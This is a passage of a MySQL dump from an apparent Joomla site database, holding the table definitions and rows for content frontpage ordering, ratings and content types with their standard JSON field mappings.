('com_content.article', 5, 99, 7, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 8, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 9, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 10, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 12, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 13, '2014-07-26 07:23:51', 1),
('com_content.article', 5, 99, 14, '2014-07-26 07:23:51', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_content_frontpage`
--

CREATE TABLE `y57u5_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_content_frontpage`
--

INSERT INTO `y57u5_content_frontpage` (`content_id`, `ordering`) VALUES
(5, 1),
(10, 3),
(11, 2);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_content_rating`
--

CREATE TABLE `y57u5_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `rating_count` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `lastip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_content_types`
--

CREATE TABLE `y57u5_content_types` (
  `type_id` int(10) UNSIGNED NOT NULL,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `table` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `rules` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_mappings` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `router` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content_history_options` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON string for com_contenthistory options'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_content_types`
--

INSERT INTO `y57u5_content_types` (`type_id`, `type_title`, `type_alias`, `table`, `rules`, `field_mappings`, `router`, `content_history_options`) VALUES
(1, 'Article', 'com_content.article', '{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\", \"note\":\"note\"}, \"special\":{\"fulltext\":\"fulltext\"}}', 'ContentHelperRoute::getArticleRoute', '{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),
(2, 'Weblink', 'com_weblinks.weblink', '{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"url\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {}}', 'WeblinksHelperRoute::getWeblinkRoute', '{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),
(3, 'Contact', 'com_contact.contact', '{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}', 'ContactHelperRoute::getContactRoute', '{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),
(4, 'Newsfeed', 'com_newsfeeds.newsfeed', '{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}', 'NewsfeedsHelperRoute::getNewsfeedRoute', '{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),
(5, 'User', 'com_users.user', '{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {}}', 'UsersHelperRoute::getUserRoute', ''),
(6, 'Article Category', 'com_content.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', 'ContentHelperRoute::getCategoryRoute', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),
(7, 'Contact Category', 'com_contact.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', 'ContactHelperRoute::getCategoryRoute', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),
(8, 'Newsfeeds Category', 'com_newsfeeds.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', 'NewsfeedsHelperRoute::getCategoryRoute', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),
(9, 'Weblinks Category', 'com_weblinks.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', 'WeblinksHelperRoute::getCategoryRoute', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),
(10, 'Tag', 'com_tags.tag', '{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}', 'TagsHelperRoute::getTagRoute', '{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),
(11, 'Banner', 'com_banners.banner', '{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}', '', '{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),
(12, 'Banners Category', 'com_banners.category', '{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}', '', '{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}', '', '{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),
(13, 'Banner Client', 'com_banners.client', '{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}', '', '', '', '{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),
(14, 'User Notes', 'com_users.note', '{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}', '', '', '', '{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),
